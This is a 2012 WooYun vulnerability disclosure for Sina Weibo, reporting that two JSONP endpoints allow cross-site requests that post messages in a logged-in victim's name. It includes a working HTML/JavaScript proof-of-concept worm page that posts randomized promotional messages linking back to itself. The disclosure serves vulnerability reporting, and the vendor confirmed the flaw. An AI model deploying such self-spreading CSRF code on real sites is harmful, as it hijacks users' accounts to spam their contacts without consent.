当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07637

漏洞标题:新浪微博jsonp跨域调用利用蠕虫

相关厂商:新浪

漏洞作者: 路人甲

提交时间:2012-05-29 14:38

修复时间:2012-07-13 14:39

公开时间:2012-07-13 14:39

漏洞类型:CSRF

危害等级:中

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-29: 细节已通知厂商并且等待厂商处理中
2012-05-29: 厂商已经确认,细节仅向厂商公开
2012-06-08: 细节向核心白帽子及相关领域专家公开
2012-06-18: 细节向普通白帽子公开
2012-06-28: 细节向实习白帽子公开
2012-07-13: 细节向公众公开

简要描述:

福建新浪个人中心调用的两个jsonp接口可以被恶意利用,获取好友信息,并利用cookie劫持无需其他授权发布欺骗信息。就像蠕虫一样传播。

详细说明:

关键代码:

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sample Page</title>
<script type="text/javascript" src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js"></script>
<script type="text/javascript" src="http://fj.sinaimg.cn/utils/API-pack.js"></script>
<script type="text/javascript">
var content = ['嘿嘿,推荐大家收听@丸子-_- ,他写的这个东西很好玩,http://wanz.im/sinaworm.html',
'我擦,@丸子-_- 他写的这个东西太牛逼了,http://wanz.im/sinaworm.html',
'昂~@丸子-_- 他写的这个东西好羞色哟~,http://wanz.im/sinaworm.html'],
pics = ["http://ww1.sinaimg.cn/bmiddle/7e7fc78bgw1ds88rpzhefj.jpg","http://ww1.sinaimg.cn/bmiddle/7e7fc78bgw1ds88rpzhefj.jpg"],
i = Math.floor(Math.random() * 2),
pic = pics[i],
success = function(json){
//window.location='http://weibo.com/hiwanz';
},
failure = function(json){
//alert(json.errmsg);
},
url = "http://common.fj.sina.com.cn/index.php/201205hgktv/weibolottery/publish?callback=?";
WBCMD("post",{content:content[Math.round(Math.random()*2)],pic:pic,atNum:1,filter:[],must:[],url:url},success,failure);
</script>
</head>

漏洞证明:

http://www.weibo.com/2254653223/yloiziEGU

修复方案:

自己看

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-05-29 16:59

厂商回复:

感谢提供,我们尽快修复。

最新状态:

暂无